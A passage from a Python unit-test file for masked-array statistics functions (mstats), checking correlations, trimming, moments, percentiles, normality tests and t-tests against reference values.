        (x, y) = (ma.fix_invalid(x), ma.fix_invalid(y))
        assert_almost_equal(mstats.spearmanr(x,y)[0], 0.6887299)

        # test for namedtuple attributes
        res = mstats.spearmanr(x, y)
        attributes = ('correlation', 'pvalue')
        check_named_results(res, attributes, ma=True)

    def test_kendalltau(self):
        # Tests some computations of Kendall's tau
        x = ma.fix_invalid([5.05, 6.75, 3.21, 2.66,np.nan])
        y = ma.fix_invalid([1.65, 26.5, -5.93, 7.96, np.nan])
        z = ma.fix_invalid([1.65, 2.64, 2.64, 6.95, np.nan])
        assert_almost_equal(np.asarray(mstats.kendalltau(x,y)),
                            [+0.3333333,0.4969059])
        assert_almost_equal(np.asarray(mstats.kendalltau(x,z)),
                            [-0.5477226,0.2785987])
        # Larger sample with ties and masked (NaN) entries.
        x = ma.fix_invalid([0, 0, 0, 0,20,20, 0,60, 0,20,
                            10,10, 0,40, 0,20, 0, 0, 0, 0, 0, np.nan])
        y = ma.fix_invalid([0,80,80,80,10,33,60, 0,67,27,
                            25,80,80,80,80,80,80, 0,10,45, np.nan, 0])
        result = mstats.kendalltau(x,y)
        assert_almost_equal(np.asarray(result), [-0.1585188, 0.4128009])

        # test for namedtuple attributes
        res = mstats.kendalltau(x, y)
        attributes = ('correlation', 'pvalue')
        check_named_results(res, attributes, ma=True)

    def test_kendalltau_seasonal(self):
        # Tests the seasonal Kendall tau.
        x = [[nan,nan, 4, 2, 16, 26, 5, 1, 5, 1, 2, 3, 1],
             [4, 3, 5, 3, 2, 7, 3, 1, 1, 2, 3, 5, 3],
             [3, 2, 5, 6, 18, 4, 9, 1, 1,nan, 1, 1,nan],
             [nan, 6, 11, 4, 17,nan, 6, 1, 1, 2, 5, 1, 1]]
        x = ma.fix_invalid(x).T
        output = mstats.kendalltau_seasonal(x)
        assert_almost_equal(output['global p-value (indep)'], 0.008, 3)
        assert_almost_equal(output['seasonal p-value'].round(2),
                            [0.18,0.53,0.20,0.04])

    def test_pointbiserial(self):
        """Point-biserial correlation with a trailing NaN in y."""
        x = [1,0,1,1,1,1,0,1,0,0,0,1,1,0,0,0,1,1,1,0,0,0,0,0,0,0,0,1,0,
             0,0,0,0,1,-1]
        y = [14.8,13.8,12.4,10.1,7.1,6.1,5.8,4.6,4.3,3.5,3.3,3.2,3.0,
             2.8,2.8,2.5,2.4,2.3,2.1,1.7,1.7,1.5,1.3,1.3,1.2,1.2,1.1,
             0.8,0.7,0.6,0.5,0.2,0.2,0.1,np.nan]
        assert_almost_equal(mstats.pointbiserialr(x, y)[0], 0.36149, 5)

        # test for namedtuple attributes
        res = mstats.pointbiserialr(x, y)
        attributes = ('correlation', 'pvalue')
        check_named_results(res, attributes, ma=True)
class TestTrimming(TestCase):
    """Tests for trimming and winsorization of masked arrays."""

    def test_trim(self):
        """mstats.trim with absolute and relative limits, 1-D and 2-D."""
        a = ma.arange(10)
        assert_equal(mstats.trim(a), [0,1,2,3,4,5,6,7,8,9])
        a = ma.arange(10)
        # Absolute limits: values outside [2, 8] are masked (shown as None).
        assert_equal(mstats.trim(a,(2,8)), [None,None,2,3,4,5,6,7,8,None])
        a = ma.arange(10)
        # Exclusive bounds drop the limit values themselves as well.
        assert_equal(mstats.trim(a,limits=(2,8),inclusive=(False,False)),
                     [None,None,None,3,4,5,6,7,None,None])
        a = ma.arange(10)
        # Relative limits: trim 10% from the low end, 20% from the high end.
        assert_equal(mstats.trim(a,limits=(0.1,0.2),relative=True),
                     [None,1,2,3,4,5,6,7,None,None])

        a = ma.arange(12)
        a[[0,-1]] = a[5] = masked
        assert_equal(mstats.trim(a, (2,8)),
                     [None, None, 2, 3, 4, None, 6, 7, 8, None, None, None])

        x = ma.arange(100).reshape(10, 10)
        expected = [1]*10 + [0]*70 + [1]*20
        # axis=None, axis=0, and axis=-1 must mask the same elements here.
        trimx = mstats.trim(x, (0.1,0.2), relative=True, axis=None)
        assert_equal(trimx._mask.ravel(), expected)
        trimx = mstats.trim(x, (0.1,0.2), relative=True, axis=0)
        assert_equal(trimx._mask.ravel(), expected)
        trimx = mstats.trim(x, (0.1,0.2), relative=True, axis=-1)
        assert_equal(trimx._mask.T.ravel(), expected)

        # same as above, but with an extra masked row inserted
        x = ma.arange(110).reshape(11, 10)
        x[1] = masked
        expected = [1]*20 + [0]*70 + [1]*20
        trimx = mstats.trim(x, (0.1,0.2), relative=True, axis=None)
        assert_equal(trimx._mask.ravel(), expected)
        trimx = mstats.trim(x, (0.1,0.2), relative=True, axis=0)
        assert_equal(trimx._mask.ravel(), expected)
        trimx = mstats.trim(x.T, (0.1,0.2), relative=True, axis=-1)
        assert_equal(trimx.T._mask.ravel(), expected)

    def test_trim_old(self):
        """trimboth/trimtail counts on unmasked and partially masked data."""
        x = ma.arange(100)
        assert_equal(mstats.trimboth(x).count(), 60)
        assert_equal(mstats.trimtail(x,tail='r').count(), 80)
        x[50:70] = masked
        trimx = mstats.trimboth(x)
        assert_equal(trimx.count(), 48)
        assert_equal(trimx._mask, [1]*16 + [0]*34 + [1]*20 + [0]*14 + [1]*16)
        x._mask = nomask
        x.shape = (10,10)
        assert_equal(mstats.trimboth(x).count(), 60)
        assert_equal(mstats.trimtail(x).count(), 80)

    def test_trimmedmean(self):
        """Trimmed mean with scalar and per-tail proportions."""
        data = ma.array([77, 87, 88,114,151,210,219,246,253,262,
                         296,299,306,376,428,515,666,1310,2611])
        assert_almost_equal(mstats.trimmed_mean(data,0.1), 343, 0)
        assert_almost_equal(mstats.trimmed_mean(data,(0.1,0.1)), 343, 0)
        assert_almost_equal(mstats.trimmed_mean(data,(0.2,0.2)), 283, 0)

    def test_trimmed_stde(self):
        """Standard error of the trimmed mean."""
        data = ma.array([77, 87, 88,114,151,210,219,246,253,262,
                         296,299,306,376,428,515,666,1310,2611])
        assert_almost_equal(mstats.trimmed_stde(data,(0.2,0.2)), 56.13193, 5)
        assert_almost_equal(mstats.trimmed_stde(data,0.2), 56.13193, 5)

    def test_winsorization(self):
        """Winsorizing clips tail values and preserves the input's mask."""
        data = ma.array([77, 87, 88,114,151,210,219,246,253,262,
                         296,299,306,376,428,515,666,1310,2611])
        assert_almost_equal(mstats.winsorize(data,(0.2,0.2)).var(ddof=1),
                            21551.4, 1)
        data[5] = masked
        winsorized = mstats.winsorize(data)
        assert_equal(winsorized.mask, data.mask)
class TestMoments(TestCase):
    """Tests for mstats moment-based statistics (moment, variation,
    skew, kurtosis, mode)."""
    # Comparison numbers are found using R v.1.5.1
    # note that length(testcase) = 4
    # testmathworks comes from documentation for the
    # Statistics Toolbox for Matlab and can be found at both
    # http://www.mathworks.com/access/helpdesk/help/toolbox/stats/kurtosis.shtml
    # http://www.mathworks.com/access/helpdesk/help/toolbox/stats/skewness.shtml
    # Note that both test cases came from here.
    testcase = [1,2,3,4]
    # NaN becomes masked via fix_invalid.
    testmathworks = ma.fix_invalid([1.165, 0.6268, 0.0751, 0.3516, -0.6965,
                                    np.nan])
    testcase_2d = ma.array(
        np.array([[0.05245846, 0.50344235, 0.86589117, 0.36936353, 0.46961149],
                  [0.11574073, 0.31299969, 0.45925772, 0.72618805, 0.75194407],
                  [0.67696689, 0.91878127, 0.09769044, 0.04645137, 0.37615733],
                  [0.05903624, 0.29908861, 0.34088298, 0.66216337, 0.83160998],
                  [0.64619526, 0.94894632, 0.27855892, 0.0706151, 0.39962917]]),
        mask=np.array([[True, False, False, True, False],
                       [True, True, True, False, True],
                       [False, False, False, False, False],
                       [True, True, True, True, True],
                       [False, False, True, False, False]], dtype=bool))

    def test_moment(self):
        """Central moments of order 1-4 of [1,2,3,4]."""
        y = mstats.moment(self.testcase,1)
        assert_almost_equal(y,0.0,10)
        y = mstats.moment(self.testcase,2)
        assert_almost_equal(y,1.25)
        y = mstats.moment(self.testcase,3)
        assert_almost_equal(y,0.0)
        y = mstats.moment(self.testcase,4)
        assert_almost_equal(y,2.5625)

    def test_variation(self):
        """Coefficient of variation (std/mean)."""
        y = mstats.variation(self.testcase)
        assert_almost_equal(y,0.44721359549996, 10)

    def test_skewness(self):
        """Biased and unbiased skewness estimates."""
        y = mstats.skew(self.testmathworks)
        assert_almost_equal(y,-0.29322304336607,10)
        y = mstats.skew(self.testmathworks,bias=0)
        assert_almost_equal(y,-0.437111105023940,10)
        y = mstats.skew(self.testcase)
        assert_almost_equal(y,0.0,10)

    def test_kurtosis(self):
        """Pearson/Fisher kurtosis, bias correction, and 2-D masked input."""
        # Set flags for axis = 0 and fisher=0 (Pearson's definition of kurtosis
        # for compatibility with Matlab)
        y = mstats.kurtosis(self.testmathworks,0,fisher=0,bias=1)
        assert_almost_equal(y, 2.1658856802973,10)
        # Note that MATLAB has confusing docs for the following case
        # kurtosis(x,0) gives an unbiased estimate of Pearson's skewness
        # kurtosis(x) gives a biased estimate of Fisher's skewness (Pearson-3)
        # The MATLAB docs imply that both should give Fisher's
        y = mstats.kurtosis(self.testmathworks,fisher=0, bias=0)
        assert_almost_equal(y, 3.663542721189047,10)
        y = mstats.kurtosis(self.testcase,0,0)
        assert_almost_equal(y,1.64)

        # test that kurtosis works on multidimensional masked arrays
        correct_2d = ma.array(np.array([-1.5, -3., -1.47247052385, 0.,
                                        -1.26979517952]),
                              mask=np.array([False, False, False, True,
                                             False], dtype=bool))
        assert_array_almost_equal(mstats.kurtosis(self.testcase_2d, 1),
                                  correct_2d)
        # Row-wise results must agree with the axis=1 computation.
        for i, row in enumerate(self.testcase_2d):
            assert_almost_equal(mstats.kurtosis(row), correct_2d[i])

        correct_2d_bias_corrected = ma.array(
            np.array([-1.5, -3., -1.88988209538, 0., -0.5234638463918877]),
            mask=np.array([False, False, False, True, False], dtype=bool))
        assert_array_almost_equal(mstats.kurtosis(self.testcase_2d, 1,
                                                  bias=False),
                                  correct_2d_bias_corrected)
        for i, row in enumerate(self.testcase_2d):
            assert_almost_equal(mstats.kurtosis(row, bias=False),
                                correct_2d_bias_corrected[i])

        # Check consistency between stats and mstats implementations
        assert_array_almost_equal_nulp(mstats.kurtosis(self.testcase_2d[2, :]),
                                       stats.kurtosis(self.testcase_2d[2, :]),
                                       nulp=4)

    def test_mode(self):
        """mode on plain and masked arrays, flattened and per-axis."""
        a1 = [0,0,0,1,1,1,2,3,3,3,3,4,5,6,7]
        a2 = np.reshape(a1, (3,5))
        a3 = np.array([1,2,3,4,5,6])
        a4 = np.reshape(a3, (3,2))
        # Masked variants: the masked values must not contribute to counts.
        ma1 = ma.masked_where(ma.array(a1) > 2, a1)
        ma2 = ma.masked_where(a2 > 2, a2)
        ma3 = ma.masked_where(a3 < 2, a3)
        ma4 = ma.masked_where(ma.array(a4) < 2, a4)
        assert_equal(mstats.mode(a1, axis=None), (3,4))
        assert_equal(mstats.mode(a1, axis=0), (3,4))
        assert_equal(mstats.mode(ma1, axis=None), (0,3))
        assert_equal(mstats.mode(a2, axis=None), (3,4))
        assert_equal(mstats.mode(ma2, axis=None), (0,3))
        assert_equal(mstats.mode(a3, axis=None), (1,1))
        assert_equal(mstats.mode(ma3, axis=None), (2,1))
        assert_equal(mstats.mode(a2, axis=0), ([[0,0,0,1,1]], [[1,1,1,1,1]]))
        assert_equal(mstats.mode(ma2, axis=0), ([[0,0,0,1,1]], [[1,1,1,1,1]]))
        assert_equal(mstats.mode(a2, axis=-1), ([[0],[3],[3]], [[3],[3],[1]]))
        assert_equal(mstats.mode(ma2, axis=-1), ([[0],[1],[0]], [[3],[1],[0]]))
        assert_equal(mstats.mode(ma4, axis=0), ([[3,2]], [[1,1]]))
        assert_equal(mstats.mode(ma4, axis=-1), ([[2],[3],[5]], [[1],[1],[1]]))

        a1_res = mstats.mode(a1, axis=None)

        # test for namedtuple attributes
        attributes = ('mode', 'count')
        check_named_results(a1_res, attributes, ma=True)

    def test_mode_modifies_input(self):
        # regression test for gh-6428: mode(..., axis=None) may not modify
        # the input array
        im = np.zeros((100, 100))
        im[:50, :] += 1
        im[:, :50] += 1
        cp = im.copy()
        a = mstats.mode(im, None)
        assert_equal(im, cp)
class TestPercentile(TestCase):
    """Tests for mstats.scoreatpercentile."""

    def setUp(self):
        # Fixture sequences retained for parity with the original suite.
        self.a1 = [3,4,5,10,-3,-5,6]
        self.a2 = [3,-6,-2,8,7,4,2,1]
        self.a3 = [3.,4,5,10,-3,-5,-6,7.0]

    def test_percentile(self):
        # Endpoints and the median of an evenly spaced sequence.
        values = np.arange(8) * 0.5
        assert_equal(mstats.scoreatpercentile(values, 0), 0.)
        assert_equal(mstats.scoreatpercentile(values, 100), 3.5)
        assert_equal(mstats.scoreatpercentile(values, 50), 1.75)

    def test_2D(self):
        # The 50th percentile is computed column-wise for 2-D input.
        table = ma.array([[1, 1, 1],
                          [1, 1, 1],
                          [4, 4, 3],
                          [1, 1, 1],
                          [1, 1, 1]])
        assert_equal(mstats.scoreatpercentile(table, 50), [1, 1, 1])
class TestVariability(TestCase):
    """ Comparison numbers are found using R v.1.5.1
    note that length(testcase) = 4
    """
    # The NaN is masked by fix_invalid, so the effective sample is [1,2,3,4].
    testcase = ma.fix_invalid([1,2,3,4,np.nan])

    def test_signaltonoise(self):
        # This is not in R, so used:
        # mean(testcase, axis=0) / (sqrt(var(testcase)*3/4))
        with warnings.catch_warnings():
            # signaltonoise is deprecated; silence the warning for the call.
            warnings.simplefilter("ignore", DeprecationWarning)
            y = mstats.signaltonoise(self.testcase)
        assert_almost_equal(y, 2.236067977)

    def test_sem(self):
        # This is not in R, so used: sqrt(var(testcase)*3/4) / sqrt(3)
        y = mstats.sem(self.testcase)
        assert_almost_equal(y, 0.6454972244)
        # Check the ddof scaling relation between ddof=0 and ddof=2.
        n = self.testcase.count()
        assert_allclose(mstats.sem(self.testcase, ddof=0) * np.sqrt(n/(n-2)),
                        mstats.sem(self.testcase, ddof=2))

    def test_zmap(self):
        # This is not in R, so tested by using:
        # (testcase[i]-mean(testcase,axis=0)) / sqrt(var(testcase)*3/4)
        y = mstats.zmap(self.testcase, self.testcase)
        desired_unmaskedvals = ([-1.3416407864999, -0.44721359549996,
                                 0.44721359549996, 1.3416407864999])
        # Only compare the unmasked entries of the result.
        assert_array_almost_equal(desired_unmaskedvals,
                                  y.data[y.mask == False], decimal=12)

    def test_zscore(self):
        # This is not in R, so tested by using:
        # (testcase[i]-mean(testcase,axis=0)) / sqrt(var(testcase)*3/4)
        y = mstats.zscore(self.testcase)
        desired = ma.fix_invalid([-1.3416407864999, -0.44721359549996,
                                  0.44721359549996, 1.3416407864999, np.nan])
        assert_almost_equal(desired, y, decimal=12)
class TestMisc(TestCase):
    """Miscellaneous mstats tests: obrientransform, ks_twosamp,
    friedmanchisquare."""

    def test_obrientransform(self):
        """O'Brien transform of two grouped samples against reference values."""
        args = [[5]*5+[6]*11+[7]*9+[8]*3+[9]*2+[10]*2,
                [6]+[7]*2+[8]*4+[9]*9+[10]*16]
        result = [5*[3.1828]+11*[0.5591]+9*[0.0344]+3*[1.6086]+2*[5.2817]+2*[11.0538],
                  [10.4352]+2*[4.8599]+4*[1.3836]+9*[0.0061]+16*[0.7277]]
        assert_almost_equal(np.round(mstats.obrientransform(*args).T,4),
                            result,4)

    def test_kstwosamp(self):
        """Two-sample KS test with two-sided, greater, and less alternatives."""
        x = [[nan,nan, 4, 2, 16, 26, 5, 1, 5, 1, 2, 3, 1],
             [4, 3, 5, 3, 2, 7, 3, 1, 1, 2, 3, 5, 3],
             [3, 2, 5, 6, 18, 4, 9, 1, 1,nan, 1, 1,nan],
             [nan, 6, 11, 4, 17,nan, 6, 1, 1, 2, 5, 1, 1]]
        x = ma.fix_invalid(x).T
        (winter,spring,summer,fall) = x.T

        assert_almost_equal(np.round(mstats.ks_twosamp(winter,spring),4),
                            (0.1818,0.9892))
        assert_almost_equal(np.round(mstats.ks_twosamp(winter,spring,'g'),4),
                            (0.1469,0.7734))
        assert_almost_equal(np.round(mstats.ks_twosamp(winter,spring,'l'),4),
                            (0.1818,0.6744))

    def test_friedmanchisq(self):
        """Friedman chi-square with and without missing values."""
        # No missing values
        args = ([9.0,9.5,5.0,7.5,9.5,7.5,8.0,7.0,8.5,6.0],
                [7.0,6.5,7.0,7.5,5.0,8.0,6.0,6.5,7.0,7.0],
                [6.0,8.0,4.0,6.0,7.0,6.5,6.0,4.0,6.5,3.0])
        result = mstats.friedmanchisquare(*args)
        assert_almost_equal(result[0], 10.4737, 4)
        assert_almost_equal(result[1], 0.005317, 6)
        # Missing values
        x = [[nan,nan, 4, 2, 16, 26, 5, 1, 5, 1, 2, 3, 1],
             [4, 3, 5, 3, 2, 7, 3, 1, 1, 2, 3, 5, 3],
             [3, 2, 5, 6, 18, 4, 9, 1, 1,nan, 1, 1,nan],
             [nan, 6, 11, 4, 17,nan, 6, 1, 1, 2, 5, 1, 1]]
        x = ma.fix_invalid(x)
        result = mstats.friedmanchisquare(*x)
        assert_almost_equal(result[0], 2.0156, 4)
        assert_almost_equal(result[1], 0.5692, 4)

        # test for namedtuple attributes
        attributes = ('statistic', 'pvalue')
        check_named_results(result, attributes, ma=True)
def test_regress_simple():
    """Regress a line with sinusoidal noise (regression test for #1273)."""
    abscissa = np.linspace(0, 100, 100)
    ordinate = 0.2 * np.linspace(0, 100, 100) + 10
    ordinate += np.sin(np.linspace(0, 20, 100))

    slope, intercept, r_value, p_value, sterr = mstats.linregress(abscissa, ordinate)
    assert_almost_equal(slope, 0.19644990055858422)
    assert_almost_equal(intercept, 10.211269918932341)

    # The result must also expose namedtuple-style attributes.
    res = mstats.linregress(abscissa, ordinate)
    attributes = ('slope', 'intercept', 'rvalue', 'pvalue', 'stderr')
    check_named_results(res, attributes, ma=True)
def test_theilslopes():
    """Theil-Sen slope: basic fit, masking, and Sen (1968) confidence bounds."""
    # Basic slope and intercept.
    slope, intercept, lower, upper = mstats.theilslopes([0, 1, 1])
    assert_almost_equal(slope, 0.5)
    assert_almost_equal(intercept, 0.5)

    # Masked entries must be ignored by the fit.
    y_masked = np.ma.array([0, 1, 100, 1], mask=[False, False, True, False])
    slope, intercept, lower, upper = mstats.theilslopes(y_masked)
    assert_almost_equal(slope, 1. / 3)
    assert_almost_equal(intercept, 2. / 3)

    # Confidence intervals from the example in Sen (1968).
    x_sen = [1, 2, 3, 4, 10, 12, 18]
    y_sen = [9, 15, 19, 20, 45, 55, 78]
    slope, intercept, lower, upper = mstats.theilslopes(y_sen, x_sen, 0.07)
    assert_almost_equal(slope, 4)
    assert_almost_equal(upper, 4.38, decimal=2)
    assert_almost_equal(lower, 3.71, decimal=2)
def test_plotting_positions():
    # Regression test for #1256: with alpha=beta=0 the positions for three
    # points are 0.25, 0.5, 0.75.
    computed = mstats.plotting_positions(np.arange(3), 0, 0)
    assert_array_almost_equal(computed.data, np.array([0.25, 0.5, 0.75]))
class TestNormalitytests():
    """Masked-array normality tests checked against their unmasked
    scipy.stats equivalents."""

    def test_vs_nonmasked(self):
        """mstats results must match stats results on unmasked input."""
        x = np.array((-2,-1,0,1,2,3)*4)**2
        assert_array_almost_equal(mstats.normaltest(x),
                                  stats.normaltest(x))
        assert_array_almost_equal(mstats.skewtest(x),
                                  stats.skewtest(x))
        assert_array_almost_equal(mstats.kurtosistest(x),
                                  stats.kurtosistest(x))

        funcs = [stats.normaltest, stats.skewtest, stats.kurtosistest]
        mfuncs = [mstats.normaltest, mstats.skewtest, mstats.kurtosistest]
        x = [1, 2, 3, 4]
        # Too few observations must raise ValueError in both variants.
        for func, mfunc in zip(funcs, mfuncs):
            assert_raises(ValueError, func, x)
            assert_raises(ValueError, mfunc, x)

    def test_axis_None(self):
        # Test axis=None (equal to axis=0 for 1-D input)
        x = np.array((-2,-1,0,1,2,3)*4)**2
        assert_allclose(mstats.normaltest(x, axis=None), mstats.normaltest(x))
        assert_allclose(mstats.skewtest(x, axis=None), mstats.skewtest(x))
        assert_allclose(mstats.kurtosistest(x, axis=None),
                        mstats.kurtosistest(x))

    def test_maskedarray_input(self):
        # Add some masked values, test result doesn't change
        x = np.array((-2,-1,0,1,2,3)*4)**2
        xm = np.ma.array(np.r_[np.inf, x, 10],
                         mask=np.r_[True, [False] * x.size, True])
        assert_allclose(mstats.normaltest(xm), stats.normaltest(x))
        assert_allclose(mstats.skewtest(xm), stats.skewtest(x))
        assert_allclose(mstats.kurtosistest(xm), stats.kurtosistest(x))

    def test_nd_input(self):
        """2-D input: each column must reproduce the 1-D result."""
        x = np.array((-2,-1,0,1,2,3)*4)**2
        x_2d = np.vstack([x] * 2).T
        for func in [mstats.normaltest, mstats.skewtest, mstats.kurtosistest]:
            res_1d = func(x)
            res_2d = func(x_2d)
            assert_allclose(res_2d[0], [res_1d[0]] * 2)
            assert_allclose(res_2d[1], [res_1d[1]] * 2)

    def test_normaltest_result_attributes(self):
        """normaltest result exposes namedtuple-style attributes."""
        x = np.array((-2, -1, 0, 1, 2, 3)*4)**2
        res = mstats.normaltest(x)
        attributes = ('statistic', 'pvalue')
        check_named_results(res, attributes, ma=True)

    def test_kurtosistest_result_attributes(self):
        """kurtosistest result exposes namedtuple-style attributes."""
        x = np.array((-2, -1, 0, 1, 2, 3)*4)**2
        res = mstats.kurtosistest(x)
        attributes = ('statistic', 'pvalue')
        check_named_results(res, attributes, ma=True)
class TestFOneway():
    # Smoke test: mstats.f_oneway must return a namedtuple with
    # statistic/pvalue attributes (uint16 inputs exercise integer handling).
    def test_result_attributes(self):
        a = np.array([655, 788], dtype=np.uint16)
        b = np.array([789, 772], dtype=np.uint16)
        res = mstats.f_oneway(a, b)
        attributes = ('statistic', 'pvalue')
        check_named_results(res, attributes, ma=True)
class TestMannwhitneyu():
    # Smoke test on heavily-tied data: mstats.mannwhitneyu must return a
    # namedtuple with statistic/pvalue attributes.
    def test_result_attributes(self):
        x = np.array([1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
                      1., 1., 1., 1., 1., 1., 1., 2., 1., 1., 1., 1., 1., 1.,
                      1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
                      1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
                      1., 1., 1., 1., 1., 1., 1., 2., 1., 1., 1., 1., 1., 1.,
                      1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
                      1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 2.,
                      1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
                      1., 1., 2., 1., 1., 1., 1., 2., 1., 1., 2., 1., 1., 2.,
                      1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
                      1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 2., 1.,
                      1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
                      1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
                      1., 1., 1., 1., 1., 1., 1., 2., 1., 1., 1., 1., 1., 1.,
                      1., 1., 1., 2., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
                      1., 1., 1., 1., 1., 1., 1., 1., 3., 1., 1., 1., 1., 1.,
                      1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
                      1., 1., 1., 1., 1., 1.])
        y = np.array([1., 1., 1., 1., 1., 1., 1., 2., 1., 2., 1., 1., 1., 1.,
                      2., 1., 1., 1., 2., 1., 1., 1., 1., 1., 2., 1., 1., 3.,
                      1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 2., 1., 2., 1.,
                      1., 1., 1., 1., 1., 2., 1., 1., 1., 1., 1., 1., 1., 1.,
                      1., 1., 1., 1., 1., 1., 1., 2., 1., 1., 1., 1., 1., 2.,
                      2., 1., 1., 2., 1., 1., 2., 1., 2., 1., 1., 1., 1., 2.,
                      2., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
                      1., 2., 1., 1., 1., 1., 1., 2., 2., 2., 1., 1., 1., 1.,
                      1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
                      2., 1., 1., 2., 1., 1., 1., 1., 2., 1., 1., 1., 1., 1.,
                      1., 1., 1., 1., 1., 1., 1., 2., 1., 1., 1., 2., 1., 1.,
                      1., 1., 1., 1.])
        res = mstats.mannwhitneyu(x, y)
        attributes = ('statistic', 'pvalue')
        check_named_results(res, attributes, ma=True)
class TestKruskal():
    # Smoke test: mstats.kruskal must return a namedtuple with
    # statistic/pvalue attributes.
    def test_result_attributes(self):
        x = [1, 3, 5, 7, 9]
        y = [2, 4, 6, 8, 10]
        res = mstats.kruskal(x, y)
        attributes = ('statistic', 'pvalue')
        check_named_results(res, attributes, ma=True)
#TODO: for all ttest functions, add tests with masked array inputs
class TestTtest_rel():
    # mstats.ttest_rel vs stats.ttest_rel, plus masked/degenerate inputs.
    def test_vs_nonmasked(self):
        np.random.seed(1234567)
        outcome = np.random.randn(20, 4) + [0, 0, 1, 2]
        # 1-D inputs
        res1 = stats.ttest_rel(outcome[:, 0], outcome[:, 1])
        res2 = mstats.ttest_rel(outcome[:, 0], outcome[:, 1])
        assert_allclose(res1, res2)
        # 2-D inputs
        res1 = stats.ttest_rel(outcome[:, 0], outcome[:, 1], axis=None)
        res2 = mstats.ttest_rel(outcome[:, 0], outcome[:, 1], axis=None)
        assert_allclose(res1, res2)
        res1 = stats.ttest_rel(outcome[:, :2], outcome[:, 2:], axis=0)
        res2 = mstats.ttest_rel(outcome[:, :2], outcome[:, 2:], axis=0)
        assert_allclose(res1, res2)
        # Check default is axis=0
        res3 = mstats.ttest_rel(outcome[:, :2], outcome[:, 2:])
        assert_allclose(res2, res3)
    def test_fully_masked(self):
        # Fully-masked or all-NaN columns must yield (nan, nan).
        np.random.seed(1234567)
        outcome = ma.masked_array(np.random.randn(3, 2),
                                  mask=[[1, 1, 1], [0, 0, 0]])
        with warnings.catch_warnings():
            warnings.filterwarnings('ignore')
            assert_array_equal(mstats.ttest_rel(outcome[:, 0], outcome[:, 1]),
                               (np.nan, np.nan))
            assert_array_equal(mstats.ttest_rel([np.nan, np.nan], [1.0, 2.0]),
                               (np.nan, np.nan))
    def test_result_attributes(self):
        np.random.seed(1234567)
        outcome = np.random.randn(20, 4) + [0, 0, 1, 2]
        res = mstats.ttest_rel(outcome[:, 0], outcome[:, 1])
        attributes = ('statistic', 'pvalue')
        check_named_results(res, attributes, ma=True)
    def test_invalid_input_size(self):
        # Mismatched sample sizes along the test axis must raise.
        assert_raises(ValueError, mstats.ttest_rel,
                      np.arange(10), np.arange(11))
        x = np.arange(24)
        assert_raises(ValueError, mstats.ttest_rel,
                      x.reshape(2, 3, 4), x.reshape(2, 4, 3), axis=1)
        assert_raises(ValueError, mstats.ttest_rel,
                      x.reshape(2, 3, 4), x.reshape(2, 4, 3), axis=2)
    def test_empty(self):
        res1 = mstats.ttest_rel([], [])
        assert_(np.all(np.isnan(res1)))
    def test_zero_division(self):
        # NOTE(review): this method calls mstats.ttest_ind, not ttest_rel --
        # looks like a copy-paste from TestTtest_ind; confirm intent.
        t, p = mstats.ttest_ind([0, 0, 0], [1, 1, 1])
        with warnings.catch_warnings():
            warnings.filterwarnings('ignore')
            assert_equal((np.abs(t), p), (np.inf, 0))
        assert_array_equal(mstats.ttest_ind([0, 0, 0], [0, 0, 0]),
                           (np.nan, np.nan))
class TestTtest_ind():
    # mstats.ttest_ind vs stats.ttest_ind, including equal_var handling.
    def test_vs_nonmasked(self):
        np.random.seed(1234567)
        outcome = np.random.randn(20, 4) + [0, 0, 1, 2]
        # 1-D inputs
        res1 = stats.ttest_ind(outcome[:, 0], outcome[:, 1])
        res2 = mstats.ttest_ind(outcome[:, 0], outcome[:, 1])
        assert_allclose(res1, res2)
        # 2-D inputs
        res1 = stats.ttest_ind(outcome[:, 0], outcome[:, 1], axis=None)
        res2 = mstats.ttest_ind(outcome[:, 0], outcome[:, 1], axis=None)
        assert_allclose(res1, res2)
        res1 = stats.ttest_ind(outcome[:, :2], outcome[:, 2:], axis=0)
        res2 = mstats.ttest_ind(outcome[:, :2], outcome[:, 2:], axis=0)
        assert_allclose(res1, res2)
        # Check default is axis=0
        res3 = mstats.ttest_ind(outcome[:, :2], outcome[:, 2:])
        assert_allclose(res2, res3)
        # Check equal_var
        res4 = stats.ttest_ind(outcome[:, 0], outcome[:, 1], equal_var=True)
        res5 = mstats.ttest_ind(outcome[:, 0], outcome[:, 1], equal_var=True)
        assert_allclose(res4, res5)
        res4 = stats.ttest_ind(outcome[:, 0], outcome[:, 1], equal_var=False)
        res5 = mstats.ttest_ind(outcome[:, 0], outcome[:, 1], equal_var=False)
        assert_allclose(res4, res5)
    def test_fully_masked(self):
        # Fully-masked or all-NaN samples must yield (nan, nan).
        np.random.seed(1234567)
        outcome = ma.masked_array(np.random.randn(3, 2), mask=[[1, 1, 1], [0, 0, 0]])
        with warnings.catch_warnings():
            warnings.filterwarnings('ignore')
            assert_array_equal(mstats.ttest_ind(outcome[:, 0], outcome[:, 1]),
                               (np.nan, np.nan))
            assert_array_equal(mstats.ttest_ind([np.nan, np.nan], [1.0, 2.0]),
                               (np.nan, np.nan))
    def test_result_attributes(self):
        np.random.seed(1234567)
        outcome = np.random.randn(20, 4) + [0, 0, 1, 2]
        res = mstats.ttest_ind(outcome[:, 0], outcome[:, 1])
        attributes = ('statistic', 'pvalue')
        check_named_results(res, attributes, ma=True)
    def test_empty(self):
        res1 = mstats.ttest_ind([], [])
        assert_(np.all(np.isnan(res1)))
    def test_zero_division(self):
        # Zero variance in one sample: |t| is inf and p is 0; identical
        # zero-variance samples give (nan, nan), for both equal_var settings.
        t, p = mstats.ttest_ind([0, 0, 0], [1, 1, 1])
        with warnings.catch_warnings():
